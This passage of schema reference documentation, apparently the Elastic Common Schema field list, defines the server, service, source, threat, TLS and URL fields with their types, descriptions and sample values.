+Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. + +type: keyword + +-- + +*`server.as.number`*:: ++ +-- +Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. + +type: long + +example: 15169 + +-- + +*`server.as.organization.name`*:: ++ +-- +Organization name. + +type: keyword + +example: Google LLC + +-- + +*`server.as.organization.name.text`*:: ++ +-- +type: text + +-- + +*`server.bytes`*:: ++ +-- +Bytes sent from the server to the client. + +type: long + +example: 184 + +format: bytes + +-- + +*`server.domain`*:: ++ +-- +Server domain. + +type: keyword + +-- + +*`server.geo.city_name`*:: ++ +-- +City name. + +type: keyword + +example: Montreal + +-- + +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + +*`server.geo.continent_name`*:: ++ +-- +Name of the continent. + +type: keyword + +example: North America + +-- + +*`server.geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`server.geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`server.geo.location`*:: ++ +-- +Longitude and latitude. + +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`server.geo.name`*:: ++ +-- +User-defined description of a location, at the level of granularity they care about. +Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. +Not typically used in automated geolocation. + +type: keyword + +example: boston-dc + +-- + +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + +*`server.geo.region_iso_code`*:: ++ +-- +Region ISO code. 
+ +type: keyword + +example: CA-QC + +-- + +*`server.geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + +*`server.ip`*:: ++ +-- +IP address of the server (IPv4 or IPv6). + +type: ip + +-- + +*`server.mac`*:: ++ +-- +MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. + +type: keyword + +example: 00-00-5E-00-53-23 + +-- + +*`server.nat.ip`*:: ++ +-- +Translated ip of destination based NAT sessions (e.g. internet to private DMZ) +Typically used with load balancers, firewalls, or routers. + +type: ip + +-- + +*`server.nat.port`*:: ++ +-- +Translated port of destination based NAT sessions (e.g. internet to private DMZ) +Typically used with load balancers, firewalls, or routers. + +type: long + +format: string + +-- + +*`server.packets`*:: ++ +-- +Packets sent from the server to the client. + +type: long + +example: 12 + +-- + +*`server.port`*:: ++ +-- +Port of the server. + +type: long + +format: string + +-- + +*`server.registered_domain`*:: ++ +-- +The highest registered server domain, stripped of the subdomain. +For example, the registered domain for "foo.example.com" is "example.com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". + +type: keyword + +example: example.com + +-- + +*`server.subdomain`*:: ++ +-- +The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. 
In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. +For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. + +type: keyword + +example: east + +-- + +*`server.top_level_domain`*:: ++ +-- +The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". + +type: keyword + +example: co.uk + +-- + +*`server.user.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`server.user.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`server.user.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`server.user.full_name.text`*:: ++ +-- +type: text + +-- + +*`server.user.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`server.user.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`server.user.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`server.user.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`server.user.id`*:: ++ +-- +Unique identifier of the user. 
+ +type: keyword + +-- + +*`server.user.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`server.user.name.text`*:: ++ +-- +type: text + +-- + +*`server.user.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +[float] +=== service + +The service fields describe the service for or from which the data was collected. +These fields help you find and correlate logs for a specific service and version. + + +*`service.ephemeral_id`*:: ++ +-- +Ephemeral identifier of this service (if one exists). +This id normally changes across restarts, but `service.id` does not. + +type: keyword + +example: 8a4f500f + +-- + +*`service.id`*:: ++ +-- +Unique identifier of the running service. If the service is comprised of many nodes, the `service.id` should be the same for all nodes. +This id should uniquely identify the service. This makes it possible to correlate logs and metrics for one specific service, no matter which particular node emitted the event. +Note that if you need to see the events from one specific host of the service, you should filter on that `host.name` or `host.id` instead. + +type: keyword + +example: d37e5ebfe0ae6c4972dbe9f0174a1637bb8247f6 + +-- + +*`service.name`*:: ++ +-- +Name of the service data is collected from. +The name of the service is normally user given. This allows for distributed services that run on multiple hosts to correlate the related instances based on the name. +In the case of Elasticsearch the `service.name` could contain the cluster name. For Beats the `service.name` is by default a copy of the `service.type` field if no name is specified. + +type: keyword + +example: elasticsearch-metrics + +-- + +*`service.node.name`*:: ++ +-- +Name of a service node. +This allows for two nodes of the same service running on the same host to be differentiated. 
Therefore, `service.node.name` should typically be unique across nodes of a given service. +In the case of Elasticsearch, the `service.node.name` could contain the unique node name within the Elasticsearch cluster. In cases where the service doesn't have the concept of a node name, the host name or container name can be used to distinguish running instances that make up this service. If those do not provide uniqueness (e.g. multiple instances of the service running on the same host) - the node name can be manually set. + +type: keyword + +example: instance-0000000016 + +-- + +*`service.state`*:: ++ +-- +Current state of the service. + +type: keyword + +-- + +*`service.type`*:: ++ +-- +The type of the service data is collected from. +The type can be used to group and correlate logs and metrics from one service type. +Example: If logs or metrics are collected from Elasticsearch, `service.type` would be `elasticsearch`. + +type: keyword + +example: elasticsearch + +-- + +*`service.version`*:: ++ +-- +Version of the service the data was collected from. +This allows to look at a data set only for a specific version of a service. + +type: keyword + +example: 3.2.4 + +-- + +[float] +=== source + +Source fields capture details about the sender of a network exchange/packet. These fields are populated from a network event, packet, or other event containing details of a network transaction. +Source fields are usually populated in conjunction with destination fields. The source and destination fields are considered the baseline and should always be filled if an event contains source and destination details from a network transaction. If the event also contains identification of the client and server roles, then the client and server fields should also be populated. + + +*`source.address`*:: ++ +-- +Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. 
+Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. + +type: keyword + +-- + +*`source.as.number`*:: ++ +-- +Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. + +type: long + +example: 15169 + +-- + +*`source.as.organization.name`*:: ++ +-- +Organization name. + +type: keyword + +example: Google LLC + +-- + +*`source.as.organization.name.text`*:: ++ +-- +type: text + +-- + +*`source.bytes`*:: ++ +-- +Bytes sent from the source to the destination. + +type: long + +example: 184 + +format: bytes + +-- + +*`source.domain`*:: ++ +-- +Source domain. + +type: keyword + +-- + +*`source.geo.city_name`*:: ++ +-- +City name. + +type: keyword + +example: Montreal + +-- + +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + +*`source.geo.continent_name`*:: ++ +-- +Name of the continent. + +type: keyword + +example: North America + +-- + +*`source.geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`source.geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`source.geo.location`*:: ++ +-- +Longitude and latitude. + +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`source.geo.name`*:: ++ +-- +User-defined description of a location, at the level of granularity they care about. +Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. +Not typically used in automated geolocation. + +type: keyword + +example: boston-dc + +-- + +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + +*`source.geo.region_iso_code`*:: ++ +-- +Region ISO code. 
+ +type: keyword + +example: CA-QC + +-- + +*`source.geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + +*`source.ip`*:: ++ +-- +IP address of the source (IPv4 or IPv6). + +type: ip + +-- + +*`source.mac`*:: ++ +-- +MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. + +type: keyword + +example: 00-00-5E-00-53-23 + +-- + +*`source.nat.ip`*:: ++ +-- +Translated ip of source based NAT sessions (e.g. internal client to internet) +Typically connections traversing load balancers, firewalls, or routers. + +type: ip + +-- + +*`source.nat.port`*:: ++ +-- +Translated port of source based NAT sessions. (e.g. internal client to internet) +Typically used with load balancers, firewalls, or routers. + +type: long + +format: string + +-- + +*`source.packets`*:: ++ +-- +Packets sent from the source to the destination. + +type: long + +example: 12 + +-- + +*`source.port`*:: ++ +-- +Port of the source. + +type: long + +format: string + +-- + +*`source.registered_domain`*:: ++ +-- +The highest registered source domain, stripped of the subdomain. +For example, the registered domain for "foo.example.com" is "example.com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". + +type: keyword + +example: example.com + +-- + +*`source.subdomain`*:: ++ +-- +The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. 
In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. +For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. + +type: keyword + +example: east + +-- + +*`source.top_level_domain`*:: ++ +-- +The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". + +type: keyword + +example: co.uk + +-- + +*`source.user.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`source.user.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`source.user.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`source.user.full_name.text`*:: ++ +-- +type: text + +-- + +*`source.user.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`source.user.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`source.user.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`source.user.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`source.user.id`*:: ++ +-- +Unique identifier of the user. 
+ +type: keyword + +-- + +*`source.user.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`source.user.name.text`*:: ++ +-- +type: text + +-- + +*`source.user.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +[float] +=== threat + +Fields to classify events and alerts according to a threat taxonomy such as the MITRE ATT&CK® framework. +These fields are for users to classify alerts from all of their sources (e.g. IDS, NGFW, etc.) within a common taxonomy. The threat.tactic.* are meant to capture the high level category of the threat (e.g. "impact"). The threat.technique.* fields are meant to capture which kind of approach is used by this detected threat, to accomplish the goal (e.g. "endpoint denial of service"). + + +*`threat.framework`*:: ++ +-- +Name of the threat framework used to further categorize and classify the tactic and technique of the reported threat. Framework classification can be provided by detecting systems, evaluated at ingest time, or retrospectively tagged to events. + +type: keyword + +example: MITRE ATT&CK + +-- + +*`threat.tactic.id`*:: ++ +-- +The id of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/ ) + +type: keyword + +example: TA0002 + +-- + +*`threat.tactic.name`*:: ++ +-- +Name of the type of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/) + +type: keyword + +example: Execution + +-- + +*`threat.tactic.reference`*:: ++ +-- +The reference url of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/ ) + +type: keyword + +example: https://attack.mitre.org/tactics/TA0002/ + +-- + +*`threat.technique.id`*:: ++ +-- +The id of technique used by this threat. 
You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) + +type: keyword + +example: T1059 + +-- + +*`threat.technique.name`*:: ++ +-- +The name of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) + +type: keyword + +example: Command and Scripting Interpreter + +-- + +*`threat.technique.name.text`*:: ++ +-- +type: text + +-- + +*`threat.technique.reference`*:: ++ +-- +The reference url of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) + +type: keyword + +example: https://attack.mitre.org/techniques/T1059/ + +-- + +*`threat.technique.subtechnique.id`*:: ++ +-- +The full id of subtechnique used by this threat. You can use a MITRE ATT&CK® subtechnique, for example. (ex. https://attack.mitre.org/techniques/T1059/001/) + +type: keyword + +example: T1059.001 + +-- + +*`threat.technique.subtechnique.name`*:: ++ +-- +The name of subtechnique used by this threat. You can use a MITRE ATT&CK® subtechnique, for example. (ex. https://attack.mitre.org/techniques/T1059/001/) + +type: keyword + +example: PowerShell + +-- + +*`threat.technique.subtechnique.name.text`*:: ++ +-- +type: text + +-- + +*`threat.technique.subtechnique.reference`*:: ++ +-- +The reference url of subtechnique used by this threat. You can use a MITRE ATT&CK® subtechnique, for example. (ex. https://attack.mitre.org/techniques/T1059/001/) + +type: keyword + +example: https://attack.mitre.org/techniques/T1059/001/ + +-- + +[float] +=== tls + +Fields related to a TLS connection. These fields focus on the TLS protocol itself and intentionally avoids in-depth analysis of the related x.509 certificate files. + + +*`tls.cipher`*:: ++ +-- +String indicating the cipher used during the current connection. 
+ +type: keyword + +example: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 + +-- + +*`tls.client.certificate`*:: ++ +-- +PEM-encoded stand-alone certificate offered by the client. This is usually mutually-exclusive of `client.certificate_chain` since this value also exists in that list. + +type: keyword + +example: MII... + +-- + +*`tls.client.certificate_chain`*:: ++ +-- +Array of PEM-encoded certificates that make up the certificate chain offered by the client. This is usually mutually-exclusive of `client.certificate` since that value should be the first certificate in the chain. + +type: keyword + +example: ["MII...", "MII..."] + +-- + +*`tls.client.hash.md5`*:: ++ +-- +Certificate fingerprint using the MD5 digest of DER-encoded version of certificate offered by the client. For consistency with other hash values, this value should be formatted as an uppercase hash. + +type: keyword + +example: 0F76C7F2C55BFD7D8E8B8F4BFBF0C9EC + +-- + +*`tls.client.hash.sha1`*:: ++ +-- +Certificate fingerprint using the SHA1 digest of DER-encoded version of certificate offered by the client. For consistency with other hash values, this value should be formatted as an uppercase hash. + +type: keyword + +example: 9E393D93138888D288266C2D915214D1D1CCEB2A + +-- + +*`tls.client.hash.sha256`*:: ++ +-- +Certificate fingerprint using the SHA256 digest of DER-encoded version of certificate offered by the client. For consistency with other hash values, this value should be formatted as an uppercase hash. + +type: keyword + +example: 0687F666A054EF17A08E2F2162EAB4CBC0D265E1D7875BE74BF3C712CA92DAF0 + +-- + +*`tls.client.issuer`*:: ++ +-- +Distinguished name of subject of the issuer of the x.509 certificate presented by the client. + +type: keyword + +example: CN=Example Root CA, OU=Infrastructure Team, DC=example, DC=com + +-- + +*`tls.client.ja3`*:: ++ +-- +A hash that identifies clients based on how they perform an SSL/TLS handshake. 
+ +type: keyword + +example: d4e5b18d6b55c71272893221c96ba240 + +-- + +*`tls.client.not_after`*:: ++ +-- +Date/Time indicating when client certificate is no longer considered valid. + +type: date + +example: 2021-01-01T00:00:00.000Z + +-- + +*`tls.client.not_before`*:: ++ +-- +Date/Time indicating when client certificate is first considered valid. + +type: date + +example: 1970-01-01T00:00:00.000Z + +-- + +*`tls.client.server_name`*:: ++ +-- +Also called an SNI, this tells the server which hostname to which the client is attempting to connect to. When this value is available, it should get copied to `destination.domain`. + +type: keyword + +example: www.elastic.co + +-- + +*`tls.client.subject`*:: ++ +-- +Distinguished name of subject of the x.509 certificate presented by the client. + +type: keyword + +example: CN=myclient, OU=Documentation Team, DC=example, DC=com + +-- + +*`tls.client.supported_ciphers`*:: ++ +-- +Array of ciphers offered by the client during the client hello. + +type: keyword + +example: ["TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384", "..."] + +-- + +*`tls.client.x509.alternative_names`*:: ++ +-- +List of subject alternative names (SAN). Name types vary by certificate authority and certificate type but commonly contain IP addresses, DNS names (and wildcards), and email addresses. + +type: keyword + +example: *.elastic.co + +-- + +*`tls.client.x509.issuer.common_name`*:: ++ +-- +List of common name (CN) of issuing certificate authority. + +type: keyword + +example: Example SHA2 High Assurance Server CA + +-- + +*`tls.client.x509.issuer.country`*:: ++ +-- +List of country (C) codes + +type: keyword + +example: US + +-- + +*`tls.client.x509.issuer.distinguished_name`*:: ++ +-- +Distinguished name (DN) of issuing certificate authority. 
+ +type: keyword + +example: C=US, O=Example Inc, OU=www.example.com, CN=Example SHA2 High Assurance Server CA + +-- + +*`tls.client.x509.issuer.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: Mountain View + +-- + +*`tls.client.x509.issuer.organization`*:: ++ +-- +List of organizations (O) of issuing certificate authority. + +type: keyword + +example: Example Inc + +-- + +*`tls.client.x509.issuer.organizational_unit`*:: ++ +-- +List of organizational units (OU) of issuing certificate authority. + +type: keyword + +example: www.example.com + +-- + +*`tls.client.x509.issuer.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`tls.client.x509.not_after`*:: ++ +-- +Time at which the certificate is no longer considered valid. + +type: date + +example: 2020-07-16 03:15:39+00:00 + +-- + +*`tls.client.x509.not_before`*:: ++ +-- +Time at which the certificate is first considered valid. + +type: date + +example: 2019-08-16 01:40:25+00:00 + +-- + +*`tls.client.x509.public_key_algorithm`*:: ++ +-- +Algorithm used to generate the public key. + +type: keyword + +example: RSA + +-- + +*`tls.client.x509.public_key_curve`*:: ++ +-- +The curve used by the elliptic curve public key algorithm. This is algorithm specific. + +type: keyword + +example: nistp521 + +-- + +*`tls.client.x509.public_key_exponent`*:: ++ +-- +Exponent used to derive the public key. This is algorithm specific. + +type: long + +example: 65537 + +Field is not indexed. + +-- + +*`tls.client.x509.public_key_size`*:: ++ +-- +The size of the public key space in bits. + +type: long + +example: 2048 + +-- + +*`tls.client.x509.serial_number`*:: ++ +-- +Unique serial number issued by the certificate authority. For consistency, if this value is alphanumeric, it should be formatted without colons and uppercase characters. 
+ +type: keyword + +example: 55FBB9C7DEBF09809D12CCAA + +-- + +*`tls.client.x509.signature_algorithm`*:: ++ +-- +Identifier for certificate signature algorithm. We recommend using names found in Go Lang Crypto library. See https://github.com/golang/go/blob/go1.14/src/crypto/x509/x509.go#L337-L353. + +type: keyword + +example: SHA256-RSA + +-- + +*`tls.client.x509.subject.common_name`*:: ++ +-- +List of common names (CN) of subject. + +type: keyword + +example: shared.global.example.net + +-- + +*`tls.client.x509.subject.country`*:: ++ +-- +List of country (C) code + +type: keyword + +example: US + +-- + +*`tls.client.x509.subject.distinguished_name`*:: ++ +-- +Distinguished name (DN) of the certificate subject entity. + +type: keyword + +example: C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net + +-- + +*`tls.client.x509.subject.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: San Francisco + +-- + +*`tls.client.x509.subject.organization`*:: ++ +-- +List of organizations (O) of subject. + +type: keyword + +example: Example, Inc. + +-- + +*`tls.client.x509.subject.organizational_unit`*:: ++ +-- +List of organizational units (OU) of subject. + +type: keyword + +-- + +*`tls.client.x509.subject.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`tls.client.x509.version_number`*:: ++ +-- +Version of x509 format. + +type: keyword + +example: 3 + +-- + +*`tls.curve`*:: ++ +-- +String indicating the curve used for the given cipher, when applicable. + +type: keyword + +example: secp256r1 + +-- + +*`tls.established`*:: ++ +-- +Boolean flag indicating if the TLS negotiation was successful and transitioned to an encrypted tunnel. + +type: boolean + +-- + +*`tls.next_protocol`*:: ++ +-- +String indicating the protocol being tunneled. 
Per the values in the IANA registry (https://www.iana.org/assignments/tls-extensiontype-values/tls-extensiontype-values.xhtml#alpn-protocol-ids), this string should be lower case. + +type: keyword + +example: http/1.1 + +-- + +*`tls.resumed`*:: ++ +-- +Boolean flag indicating if this TLS connection was resumed from an existing TLS negotiation. + +type: boolean + +-- + +*`tls.server.certificate`*:: ++ +-- +PEM-encoded stand-alone certificate offered by the server. This is usually mutually-exclusive of `server.certificate_chain` since this value also exists in that list. + +type: keyword + +example: MII... + +-- + +*`tls.server.certificate_chain`*:: ++ +-- +Array of PEM-encoded certificates that make up the certificate chain offered by the server. This is usually mutually-exclusive of `server.certificate` since that value should be the first certificate in the chain. + +type: keyword + +example: ["MII...", "MII..."] + +-- + +*`tls.server.hash.md5`*:: ++ +-- +Certificate fingerprint using the MD5 digest of DER-encoded version of certificate offered by the server. For consistency with other hash values, this value should be formatted as an uppercase hash. + +type: keyword + +example: 0F76C7F2C55BFD7D8E8B8F4BFBF0C9EC + +-- + +*`tls.server.hash.sha1`*:: ++ +-- +Certificate fingerprint using the SHA1 digest of DER-encoded version of certificate offered by the server. For consistency with other hash values, this value should be formatted as an uppercase hash. + +type: keyword + +example: 9E393D93138888D288266C2D915214D1D1CCEB2A + +-- + +*`tls.server.hash.sha256`*:: ++ +-- +Certificate fingerprint using the SHA256 digest of DER-encoded version of certificate offered by the server. For consistency with other hash values, this value should be formatted as an uppercase hash. 
+ +type: keyword + +example: 0687F666A054EF17A08E2F2162EAB4CBC0D265E1D7875BE74BF3C712CA92DAF0 + +-- + +*`tls.server.issuer`*:: ++ +-- +Subject of the issuer of the x.509 certificate presented by the server. + +type: keyword + +example: CN=Example Root CA, OU=Infrastructure Team, DC=example, DC=com + +-- + +*`tls.server.ja3s`*:: ++ +-- +A hash that identifies servers based on how they perform an SSL/TLS handshake. + +type: keyword + +example: 394441ab65754e2207b1e1b457b3641d + +-- + +*`tls.server.not_after`*:: ++ +-- +Timestamp indicating when server certificate is no longer considered valid. + +type: date + +example: 2021-01-01T00:00:00.000Z + +-- + +*`tls.server.not_before`*:: ++ +-- +Timestamp indicating when server certificate is first considered valid. + +type: date + +example: 1970-01-01T00:00:00.000Z + +-- + +*`tls.server.subject`*:: ++ +-- +Subject of the x.509 certificate presented by the server. + +type: keyword + +example: CN=www.example.com, OU=Infrastructure Team, DC=example, DC=com + +-- + +*`tls.server.x509.alternative_names`*:: ++ +-- +List of subject alternative names (SAN). Name types vary by certificate authority and certificate type but commonly contain IP addresses, DNS names (and wildcards), and email addresses. + +type: keyword + +example: *.elastic.co + +-- + +*`tls.server.x509.issuer.common_name`*:: ++ +-- +List of common name (CN) of issuing certificate authority. + +type: keyword + +example: Example SHA2 High Assurance Server CA + +-- + +*`tls.server.x509.issuer.country`*:: ++ +-- +List of country (C) codes + +type: keyword + +example: US + +-- + +*`tls.server.x509.issuer.distinguished_name`*:: ++ +-- +Distinguished name (DN) of issuing certificate authority. 
+ +type: keyword + +example: C=US, O=Example Inc, OU=www.example.com, CN=Example SHA2 High Assurance Server CA + +-- + +*`tls.server.x509.issuer.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: Mountain View + +-- + +*`tls.server.x509.issuer.organization`*:: ++ +-- +List of organizations (O) of issuing certificate authority. + +type: keyword + +example: Example Inc + +-- + +*`tls.server.x509.issuer.organizational_unit`*:: ++ +-- +List of organizational units (OU) of issuing certificate authority. + +type: keyword + +example: www.example.com + +-- + +*`tls.server.x509.issuer.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`tls.server.x509.not_after`*:: ++ +-- +Time at which the certificate is no longer considered valid. + +type: date + +example: 2020-07-16 03:15:39+00:00 + +-- + +*`tls.server.x509.not_before`*:: ++ +-- +Time at which the certificate is first considered valid. + +type: date + +example: 2019-08-16 01:40:25+00:00 + +-- + +*`tls.server.x509.public_key_algorithm`*:: ++ +-- +Algorithm used to generate the public key. + +type: keyword + +example: RSA + +-- + +*`tls.server.x509.public_key_curve`*:: ++ +-- +The curve used by the elliptic curve public key algorithm. This is algorithm specific. + +type: keyword + +example: nistp521 + +-- + +*`tls.server.x509.public_key_exponent`*:: ++ +-- +Exponent used to derive the public key. This is algorithm specific. + +type: long + +example: 65537 + +Field is not indexed. + +-- + +*`tls.server.x509.public_key_size`*:: ++ +-- +The size of the public key space in bits. + +type: long + +example: 2048 + +-- + +*`tls.server.x509.serial_number`*:: ++ +-- +Unique serial number issued by the certificate authority. For consistency, if this value is alphanumeric, it should be formatted without colons and uppercase characters. 
+ +type: keyword + +example: 55FBB9C7DEBF09809D12CCAA + +-- + +*`tls.server.x509.signature_algorithm`*:: ++ +-- +Identifier for certificate signature algorithm. We recommend using names found in Go Lang Crypto library. See https://github.com/golang/go/blob/go1.14/src/crypto/x509/x509.go#L337-L353. + +type: keyword + +example: SHA256-RSA + +-- + +*`tls.server.x509.subject.common_name`*:: ++ +-- +List of common names (CN) of subject. + +type: keyword + +example: shared.global.example.net + +-- + +*`tls.server.x509.subject.country`*:: ++ +-- +List of country (C) code + +type: keyword + +example: US + +-- + +*`tls.server.x509.subject.distinguished_name`*:: ++ +-- +Distinguished name (DN) of the certificate subject entity. + +type: keyword + +example: C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net + +-- + +*`tls.server.x509.subject.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: San Francisco + +-- + +*`tls.server.x509.subject.organization`*:: ++ +-- +List of organizations (O) of subject. + +type: keyword + +example: Example, Inc. + +-- + +*`tls.server.x509.subject.organizational_unit`*:: ++ +-- +List of organizational units (OU) of subject. + +type: keyword + +-- + +*`tls.server.x509.subject.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`tls.server.x509.version_number`*:: ++ +-- +Version of x509 format. + +type: keyword + +example: 3 + +-- + +*`tls.version`*:: ++ +-- +Numeric part of the version parsed from the original string. + +type: keyword + +example: 1.2 + +-- + +*`tls.version_protocol`*:: ++ +-- +Normalized lowercase protocol name parsed from original string. + +type: keyword + +example: tls + +-- + +*`span.id`*:: ++ +-- +Unique identifier of the span within the scope of its trace. +A span represents an operation within a transaction, such as a request to another service, or a database query. 
+ +type: keyword + +example: 3ff9a8981b7ccd5a + +-- + +*`trace.id`*:: ++ +-- +Unique identifier of the trace. +A trace groups multiple events like transactions that belong together. For example, a user request handled by multiple inter-connected services. + +type: keyword + +example: 4bf92f3577b34da6a3ce929d0e0e4736 + +-- + +*`transaction.id`*:: ++ +-- +Unique identifier of the transaction within the scope of its trace. +A transaction is the highest level of work measured within a service, such as a request to a server. + +type: keyword + +example: 00f067aa0ba902b7 + +-- + +[float] +=== url + +URL fields provide support for complete or partial URLs, and supports the breaking down into scheme, domain, path, and so on. + + +*`url.domain`*:: ++ +-- +Domain of the url, such as "www.elastic.co". +In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. + +type: keyword + +example: www.elastic.co + +-- + +*`url.extension`*:: ++ +-- +The field contains the file extension from the original request url, excluding the leading dot. +The file extension is only set if it exists, as not every url has a file extension. +The leading period must not be included. For example, the value must be "png", not ".png". +Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). + +type: keyword + +example: png + +-- + +*`url.fragment`*:: ++ +-- +Portion of the url after the `#`, such as "top". +The `#` is not part of the fragment. + +type: keyword + +-- + +*`url.full`*:: ++ +-- +If full URLs are important to your use case, they should be stored in `url.full`, whether this field is reconstructed or present in the event source. 
